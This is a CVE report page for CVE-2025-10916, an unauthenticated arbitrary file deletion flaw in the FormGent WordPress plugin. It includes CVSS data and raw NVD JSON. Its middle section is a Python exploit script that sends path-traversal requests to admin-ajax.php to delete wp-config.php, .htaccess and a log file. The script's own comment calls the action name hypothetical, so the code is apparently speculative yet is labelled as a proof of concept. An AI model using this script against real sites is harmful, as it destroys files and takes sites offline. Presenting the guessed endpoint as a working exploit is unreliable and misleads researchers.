Security Vulnerability Report
CVE-2025-10916 CVSS 9.1 CRITICAL

CVE-2025-10916

Published: 2025-10-21 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The FormGent WordPress plugin before 1.0.4 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FormGent WordPress Plugin < 1.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10916 - FormGent WordPress Plugin Arbitrary File Deletion PoC
# Vulnerability: Insufficient file path validation in FormGent plugin < 1.0.4
# CVSS: 9.1 (CRITICAL)

import requests

TARGET_URL = "http://target-wordpress-site.com"

# The vulnerable endpoint in FormGent plugin that handles file deletion
VULNERABLE_ENDPOINT = "/wp-admin/admin-ajax.php"


def exploit(target_url, file_to_delete):
    """
    Exploit arbitrary file deletion vulnerability in FormGent WordPress plugin.

    Args:
        target_url: The base URL of the target WordPress site
        file_to_delete: Relative path to the file to delete (e.g., '../../../wp-config.php')
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"

    # Construct payload with path traversal to delete arbitrary files
    payload = {
        "action": "formgent_delete_file",  # Hypothetical action name
        "file_path": file_to_delete
    }

    # Send exploit request - no authentication required (PR:N)
    response = requests.post(url, data=payload)

    if response.status_code == 200:
        print(f"[+] Exploit sent successfully to delete: {file_to_delete}")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        return False


if __name__ == "__main__":
    # Target critical WordPress files for deletion
    target_files = [
        "../../../wp-config.php",        # WordPress configuration file
        "../../../.htaccess",            # Apache configuration
        "../../../wp-content/debug.log", # Debug log file
    ]

    for target_file in target_files:
        exploit(TARGET_URL, target_file)

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10916",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T06:15:43.527",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The FormGent WordPress plugin before 1.0.4 is vulnerable to arbitrary file deletion due to insufficient file path validation. This makes it possible for unauthenticated attackers to delete arbitrary files on the server."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/81c23998-1abb-495f-890a-79624a4cab9a/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}